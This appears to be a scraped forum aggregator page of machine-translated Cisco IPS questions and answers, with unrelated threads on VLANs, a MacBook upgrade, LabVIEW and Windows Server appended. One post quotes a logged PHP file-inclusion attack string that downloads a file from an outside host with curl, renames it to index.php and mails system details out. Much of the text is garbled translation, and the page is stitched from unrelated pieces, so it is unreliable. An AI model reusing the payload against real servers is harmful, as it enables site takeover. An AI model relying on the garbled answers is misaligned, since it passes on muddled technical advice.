Application whitelisting with Cisco IPS
I was wondering can Cisco IPS appliance 4360 do application white list?
For my test of understanding action filter is based on the source and destination IP address whitelisting?
Hello
It's good event action filter is based on the source and the IP addresses, it cannot be used to map a specific application.
Kind regards
Julio
Tags: Cisco Security
Similar Questions
-
Cisco ips 6.2 vs cisco ips 7.0
Hi all
I have some experience with cisco IPS, but I want to know are there any differences between these two.
or someone knows registred bug with this model two problem?
which one is best? If you want to buy? I need comparison when I go to the docs all have two similar restistiction and the limit, usually for IPv6.
My goal to choose any! which is better and why?
If you have an idea please share. and thanks for that!
Concerning
Jonathan David
Always choose the latest version 7.0 IPS because it has new features and bug fixes that have been found in the earlier version.
BTW, if you buy IPS, you will not buy based on the version because the software comes with it by default, but you can upgrade and downgrade it accordingly if you want.
There are actually many different models of IPS, and here is the list:
-IPS 4200 series
-Module AIP on ASA firewall
-IOS IPS
-IDSM2 6500 series Switch
-AIM or NME IPS on routers
They all can run the version 6.2 or 7.0 or any other supported in this platform.
-
Not entirely taken TLS supported in Cisco IPS 4240
I am trying to contact a Cisco IPS 4240 device while having security settings FIPS enabled on the client using SSL. This is not possible because the device does not support TLS extensions in the Client Hello packet (RFC 5746) sent by the client when using TLS (SSL3 and lower are not FIPS compatible). The IDM application that communicates with the device does not send these extensions (im seeing this with WireShark) TLS is able to connect to it.
Is it possible to provide the 4240 support these TLS extensions?
This is related to the bugs below. The original solution will be included in the 7.1.5 release which is preparing to take in charge the platform 4240 among others. This will allow the Web server IPS to ignore short-term extensions. The long-term solution will require an update to the Web server so that it is fully compliant with RFC 5746.
Todd
-
PHP exploit triggers Cisco Security Agent but NOT at Cisco IPS... why?
Does anyone know what signing this feat should trigger with the Cisco IPS sensor? You are not sure if there is one, or if we turned it off?
We see this feat hit our Exchange servers several times during the week.
The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.
I think that this could be the exploit of mambo. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on mambo MySDN and found GIS 5163 "Mambo Site Server Administration Password ByPass" here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS can not seen this so it was more than 443.
Hope this helps
M
-
Deployment of Cisco IPS 4240 devices
I can't find all the information about the Cisco IPS 4240 features massive deployments. I have 6 devices, I intend to drive to several remote sites and tie in a centralized unit of Cisco MARCH. Without the help of any CSM/LMS software, is there a quick and dirty to pull this off? I think to set up a single IPS appliance, then pull and distribute the configuration file for the remaining devices. I would like to see how others have done this...
If all of your sensors are of the same type (all 4240 to your situation) and will execute all the even correct configuration, then the copy command will help out you.
There is a new feature added to the copy command in IPS 6.1 which will help you during the copying of config of one sensor to another.
Complete you configure a sensor (using IME, IDM or CLI). When you are satisfied with the configuration, and then use the command copy to copy ON a server of SCP.
Now bringup a second sensor and configure basic networking through the Installer settings (ip address, gateway, etc...).
Now, use the command copy to copy the first configuration of sensors from the SCP server in the running of the second probe configuration on the second.
It will ask you to change the network settings on the second probe.
Answer n °
The rest of the configuration of the probe first copy will be placed in the second sensor.
The second sensor will keep its own unique IP address but win the rest of the configuration of the config of the first probe.
Continue to do this with additional sensors.
The process can then be repeated every time that additional changes are made to the first sensor.
Remember though that this only works if the configuration of the probe will be exactly duplicated (including what interfaces would be monitored and how).
If each sensor will have some unique tunings, then you need to manage each sensor on its own or buy CSM which can be used to share only parts of the configuration of multiple sensors.
-
user account to download Cisco IPS signature
Hi all
I wanted to activate the automatic update in IPS but he asks Cisco VAC with cryptographic privileges for tΘlΘcharger Cisco.com Cisco IPS signature and engine signature updates.
is their any default access for this?
I have VAC ORC is if this can be used?
You must have a Cisco.com user with privileges to download Cisco IPS signature and signature updates cryptographic engine of Cisco.com.
Using your cisco.com account go to this link and see if you can download the IPS - K9 - 6.1 - 2 - E3.pkg to your own desktop machine.
If you cannot download this file with your account, then you can use that account and password when you set up the sensor for updates automatic cisco.com.
If you can not download the file with your account, your account does not have the right settings.
Your account does not have access crypto or your account is not correctly connected to your service contract for your sensors.
There are a handful of countries not allowed access crypto, users of other countries would just get their account changed to crypto access (I'm not sure what is this procedure).
-
Recovery v1 in cisco IPS SSL Session key
Hi all
In network audit, I have the comment mentioned by the auditor for cisco IPS 4270 device. but I don't get any solution for the same thing. Kindly help me out on this.
V1 SSL Session key recovery
The remote SSH daemon supports connections made
using the version 1.33 or 1.5 of the SSH
Protocol. These protocols are not completely
cryptographically safe so they should not be used.
With respect,
Sashi
Currently there is no way only allow SSH version 2 and disable SSH version 1 on IPS.
Here is the request for improvement which have been filed for your reference:CSCsk84977
Hope that answers your question.
-
Ssm - 20 upgrade: cisco ips canceled upgrade because...
Hi all
I have upgraded our ASA 55402 with SSM-20 modules.
Upgrading a module version 7.0000 E4 to of 6,0000 E4 everything went well.
However, the other returned the following error when you try to upgrade the image and recovery partition:
-cisco ips update cancelled because another upgrade or downgrade is underway
The firewall that I intend to do the upgrade is passive.
Firmware ASA: v9.1.1.
Search Internet and this forum.
Everyone fell on this?
Thanx
Jaap
"Reset the hw-module module 1' it cause no problems at all.
-
Does anyone have a guide to the Cisco IPS Manager Express Administrator?
Hello.
Does anyone have a guide to the administrator of the Cisco IPS Manager Express?, I need to update my license some a procedure?, if I have an IPS with Bypass the configuration at the time of the closing of SPI interfaces will license update or will have no affection?
Thank you.
Here you will find guides - everything depends on your version:
For example, here is the 7.1 version SEO licenses:
Apply a license will not stop interfaces... However, if you apply an update of the signature, you'll stop traffic for a short time during the installation of the signatures up-to-date inspection.
Hope that helps.
-
Compatibility of VLAN with Cisco
Hello
We just bought 10 x new Netgear switches (all M4100) to add to an existing Cisco infrastructure.
Simple configuration with only 6 Valns.
5: Admin, 30: VOIP, 101: management, 100: a set of Workstations, 102: second series of Workstations, 200: IPTV, 400: Internet, 401: Wireless Management
All I wanted to do was: 2 last ports each switch netgear = T and all the VLANS. I have not identified all ports if I want to use in the appropriate vlan
101 of VLAN is my Managementt Vlan. (Need to configure inter vlan routing for this to work)
I only turned on three switches up to now and all three do not work. They work for a while and that packets but do not receive all.
What I am doing wrong?
What I need to get rid of the original vlan1 on the netgear?
Is that what I need config in the STP to make these compatible with Cisco (300 and 400 series) switches.
I use an optical backbone on Cisco and Netgear switches.
Sincere greetings,
OLAF
Hi Moussa,.
Thanks for reaching out.
We got it working.
Step 1: upgrade to the latest firmware.
Step 2: Forget the MISTLETOE.
We had a few questions about the old firmware - causing links to trunk have some incompatibility with their tag and removed the images between Cisco and Netgear brand.
After the upgrade of the firmware that we had access to "switchport mode access" and "switchport mode trunk" orders fixing the access port and trunking issues.
Thank you Mr President,
OLAF
-
Hello, hope someone can help with my MacBook Pro sluggish.
I'm in OS X Yosemite 10.10.3 version and tried to upgrade to El Capitan 10.10.5 on a Macbook Pro 13inc mid-2012. He said it has already downloaded twice, but when I open the software it is still sitting at 10.10.3 without modification, download seems to take a lot of time - been sitting for about 6 hours.
Now I trying to open the photos app but get the following error coming - the application built with PhotoLibraryPrivate version 215.65.00 but works with version 209.52.00.
Any advice on what are the options for my new photos app! Have you tried different time machine backups and the computer does not like it either
Upgrade to El Captain OS X 10.11.2 which includes Photo 1.3
I have no idea of what you see on "El Capitan 10.10.5" as far as I know is not exiat
LN
-
On my Mac Book Pro to always stop get question "continue application"? with the boxes option to cancel or continue the request.
Selection of abandonment does not prevent the following message appears when closing next down.
Activity monitor shows all the applications that you have
installed, running in the background? Something can be...
If you open the force quit, are there topics other than the Finder
and maybe a browser?
You repaired the disk from disk utility permissions lately?
We could also see other boot options on the use in
Recovery of OS X to use the "OS X Utilities" in there. Be careful.
Is there more than one user account on your computer? If you
Start in another user account and have auto login for
the fact that it is one that rises at the start, a piece
similar issues or is it just works fine on shut down?
The question may take some trial and error troubleshooting. This
may include some basic startup keyboard shortcuts for
the computer to start in Safe Mode, to do more test, etc.
If you have access to an official Apple store, you can be
able to set up an engineering appointment & have someone closer.
Good luck anyway...
-
Applications installed with device drivers OR
I bought a few applications that have been written entirely in LabVIEW that also use data acquisition OR PXI cards. Before the installation, I installed the drivers of devices OR newer. I discovered that more than 70 applications installed with the drivers. Where can I learn what do each of these applications? I need this information because, in order for me to install device drivers OR on my networked computers, I need to know what my local network vulnerabilities could be introduced with these applications. If anyone can help? I enclose a list of executables (*.exe) installed in the C:\Program NIUninstaller Instruments\ folder only.
Hi USAARL.
I follow with you on a private message. As mentioned, we have what you ask because well documented right now, it's something we will address actively. We are having this type of information will be documented and available to all users soon. Please, followed in the manner specified in the private message.
-
All 32-bit applications crash with error 0xc000005 after windows Server 2008 R2 backup
Hello world...
I am in a big mess... and really need help!
I did last night a Backup windows... but one of my users were connected to the server works with applications...
and this morning No 32 no bits applications... same installer...
the 64-bit application works very well...Others or generating an error 0xc000005 and stop...
failing Ole32.dll module...And I'm sure that the backup is reliable, even if the backup of windows said it was successful...
I tried to restore only the apps files... but it seems more complicated than that...
If anyone has an idea...
Hi, Emeric,.
Thanks for posting the question on Microsoft Community.
According to the description, it seems that 32-bit applications crash with an 0xc000005 error code in Windows Server 2008.
As the question more appropriate forums Technet, write the topic in this forum for better support.
http://social.technet.Microsoft.com/forums/en-us/WindowsBackup/threads
Using the windows-related issues feel free to post on Microsoft Community.
-
MsiError 1627 then install application created with labview 2009
Hello
I tried to install an application created with labview 2009, I have this fatal error ' MsiError 1627: 1: 2727 2: UsFile.
Executable works fine while the installer does not work!
UsFile is a Lvclass. I don't understand why I have this message.
Thank you very much.
Hi thanks for the reply,
I don't delete the installation program. It has not been disabled or corrupted MSI.
Problem is in the source file: ProgramFilesFolder was not also identical to my request. So I refreshed that (the folder UsFile appeared not in ProgramFilesFolde)
Now it works!
Thank you very much Bye
Maybe you are looking for
-
When I reply to a message, there is no visible text and it won't let me type. How can I fix?
It's as if the account is frozen, but sometimes only. I can click on a received message and it looks like a normal response but it will not any text at all. If I try to type it shows nothing. Sometimes, I turned off the computer and when it comes bac
-
Tecra S1: How to configure the connection of modem to dial upward
Hi all Would someone be able to help me how I should configure the modem connection to dial upward, I tried to do it through the connection of the Wizard but it does not dial a number and I have no idea what could be the problem. Would be very gratef
-
Where to learn all the features of navigation
Hi, I'm new to the ground to Apple. I have an iMac El Capitan 10.11.2 running. I am looking for a document that explains how to navigate between applications. For example, today I used the green button to set a screen shared with another App (ew f
-
How to add the phase parameter to array of waveform in the DaQmx continuous output example?
Hi all I'm quite beginning to Labview. I just wanted to know how can I add stage information for the module of waveform existing as shown in the example of output Voltage-Continuous DaQmx. SEEE attached, I thought that the "output" is actually a buil
-
The scan button does not work on Windows XP Media Center edition 2005
Name of the printer: hp psc 1350 all-in-one Hi, this is happened since I reinstalled the operating system with an OEM disc, removing all the hp stuff. I got a new OEM drive that comes from hp (I think... well hp stuff works now) but the scan button d